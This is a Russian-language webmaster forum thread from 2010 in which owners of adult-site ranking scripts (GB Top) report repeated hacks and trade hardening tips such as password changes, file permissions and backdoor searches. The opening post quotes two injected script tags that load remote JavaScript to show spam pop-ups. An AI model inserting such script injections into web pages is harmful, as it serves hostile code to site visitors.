Master-X
Форум | Новости | Статьи
Главная » Форум » Топы » 
Тема: (Лечение!) Ахтунг атакуют топы или дыра GB Top
цитата
17/11/10 в 08:05
 Дольчик ххх
опять сталкиваюсь с такой проблемой что мои топы поламаны и в них содержит посторонний Код:
<script language="javascript" src="http://www.clayaim.com/index.php?ref=webex"></script>
<script src=http://crv.cc/c/></script>

При заходи на сайт и после полной загрузки страницы появляется всплывающее поп окошко с рекламой виагры!
П.С. Версию топа обновил до последней версии 5.4 пасы поменял антивирус не выключаю но в скрипте время от времени бывает появляется посторонний код, даже гугл аналистик удалил, может через него как запихивают, хотя сколько работаю в онлайн не разу не сталкивался чтоб сайт был поломан только после того как в скрипте однажды появилась дырочка )
цитата
17/11/10 в 17:56
 Retox
Возможно первый раз когда в шаблоны через узявимость был вставлен сплоит - ты заразил комп трояном с ф-цие форм грабер или ФТП снифером.
Хацкер смотря логи трояна увидел пароль на вход в админку и юзает его сейчас, тоже самое и с ФТП - возможно имеет доступ к фтп и инжектит всякие компоненты!
Как вариант
-поменяй пароли к admin.php
-смени ФТП пароль или разреши только с твоего ИП заходить на ФТП
-на файлы темплейтов поставть права 644 (редактировать придётся десктопно)
-проверь комп с помощью KIS и Cure It вохможно где то засел троян, так же на сервере где топы может быть руткит.
цитата
19/11/10 в 23:32
 Big Voo
admin.php сделать блокировку доступа по айпи - в настройках вэб сервера

это самое простое
цитата
30/11/10 в 13:42
 salo
Владелец http://top-porn-games.sexgamepark.com твой топ пробили, консоль тебе подвесили, похоже в футере ищи вражеский скрипт
цитата
30/11/10 в 15:56
 Danyil
Удалил...
цитата
01/12/10 в 12:34
 Retox
Danyil у тебя тоже через webmasters регу инекцию кода сделали?
Что то повальное заражение идёт....
цитата
01/12/10 в 19:03
 Bruno
salo писал:
Владелец http://top-porn-games.sexgamepark.com твой топ пробили, консоль тебе подвесили, похоже в футере ищи вражеский скрипт


Ахуенный дез топа! Очень понравился.
цитата
02/12/10 в 19:54
 sansay
salo писал:
Владелец http://top-porn-games.sexgamepark.com твой топ пробили, консоль тебе подвесили, похоже в футере ищи вражеский скрипт

Спасибо, почистил
цитата
02/12/10 в 21:42
 Danyil
С помощью саппорта хоста, вычислили, что у меня на всех топах сетки изменён файл index.php
Всё восстановил, вроде пока проявлений вражеской деятельности незаметно. Затаился гад...
цитата
02/12/10 в 22:54
 CrazyMen
Danyil: Этот же фаил заменяется при обновлении топа
цитата
06/12/10 в 22:56
 J_Geer
Danyil писал:
С помощью саппорта хоста, вычислили, что у меня на всех топах сетки изменён файл index.php
Всё восстановил, вроде пока проявлений вражеской деятельности незаметно. Затаился гад...

Я на все index.* ставлю 444, да и на прочее, не требующее записи, тоже по возможности. Во многих случаях спасает...
цитата
11/12/10 в 00:23
 salo
как все таки грамотно выставить на ГБ топ права чтобы и от атак обезвредить и чтобы все считало и работало
на саму папку где находится скрипт 755
alternative-templates 755
autorank 755
backupfiles 777
cgi-bin 755
datafiles 777
docs 755
memberfiles 777
templates 755
index.php 644
переименовать admin.php на другой и выставить 755
удалить File phpinfo.php
Все правильно ??? я пережил уже 4 атаки icon_evil.gif
цитата
11/12/10 в 00:24
 salo
я выставлял и на templates 644, на как то через раз открывает страницу топа
цитата
11/12/10 в 12:45
 CrazyMen
На пакпу темплейтс оставляйте 777 а на то что внутри 644. фаил uninstall.php тоже удалите.
цитата
11/12/10 в 13:52
 Alexandur
alternative-templates 755
autorank 755
cgi-bin 755
docs 755
и не нужны
цитата
11/12/10 в 14:00
 CrazyMen
gimcnuk: Эт точно. Ксттаи такое ощущение что овнеру срикпт не нужен может купим вскладчину?
цитата
11/12/10 в 14:08
 Alexandur
Он не продаёт, там алгоритм уникальный.
Вскладчину можно и новый скрипт заказать и выложить по GPL лицензии. Только без меня icon_cool.gif
цитата
11/12/10 в 14:17
 CrazyMen
gimcnuk: Что так icon_mrgreen.gif?
цитата
15/12/10 в 00:00
 sansay
Седня п*др опять повесил свою фигню на все мои сайты, правит все сайты на серваке (индексы и протоновский ssi_in.php). Смотрите не было ли у вас рецидива...
цитата
15/12/10 в 19:48
 Дольчик ххх
и мои тоже сайты как всегда подверглись очередной атаке, самое интересное это хакеридзе все придумывает и неустает очередные идеи как обмануть честных мастеров, заходил под ру айпи все ок, вирусов нету, а если зайти через зарубежные айпи то вирус как ту появляется, предполагаю что хакер русский или где не далеко, бывает редирект идет на русские ПП и в основном это фарма. Будемс ждать следующей атаки... ;)
цитата
15/12/10 в 21:51
 CrazyMen
Ищите айпишник его, выкладывайте надо решать что то
цитата
19/12/10 в 19:00
 salo
18 числа опять хакер изменил index.php, стояли права 644, хз че делать, в админке хоста пишет что файл изменил apache
цитата
19/12/10 в 19:12
 salo
кое-где он после замены файла права на 444 поменял, как то
цитата
19/12/10 в 19:25
 Дольчик ххх
да ваще безобразие творится какое то )
---
Подскажите, если с ГБ скрипта перейти на скрипт сиджей например на кристал, протон, трейд пульс может быть не будет таких атак? ГБ Скрипт все меньше и меньше теряет свои позиции бесплатного популярного скрипта, как раньше было smail54.gif
цитата
19/12/10 в 20:05
 Alexandur
salo: возможно, был залит бекдор и гбскрипт уже не при чём. Поищи сторонние файлы.
Стр. « первая   <  1, 2, 3, 4, 5  >  последняя »


Эта страница в полной версии